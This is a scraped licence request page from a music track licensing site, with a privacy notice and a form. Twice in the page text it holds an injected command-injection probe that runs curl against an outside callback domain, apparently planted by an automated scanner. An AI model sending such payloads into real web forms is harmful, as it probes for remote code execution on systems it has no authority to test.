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Demon Music Group Track Licensing
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{system(“curl http://0.2qij9xlw3ejd11yqahenh5{“”}hk7wcstpvea.szp.prbly.win”)}
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Demon Music Track Licensing will only retain your personal data for the purpose of your use of the account functions on this website; to create your own projects, project playlists and to submit license requests. We will only contact you in response to a license request submission and we will not share your data with any other parts of the Demon Group or any 3rd parties.
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{system(“curl http://0.2qij9xlw3ejd11yqahenh5{“”}hk7wcstpvea.szp.prbly.win”)}
Request a licence for the tracks:
Usage details
Intended use
Select a Usage
TV Commercial
TV Commercial 2
License period
Select a Period
Up to 1 year
Up to 2 year
Territories required
Select a Territory
UK and Ireland only
UK and Ireland only 2
Production title (Optional)
Account details
Full name*
Email address*
Phone number
Company/Organisation name*
Position in company*
Select a Position
Junior researcher
Junior researcher 2
Junior researcher 3
Company address*
send licence request
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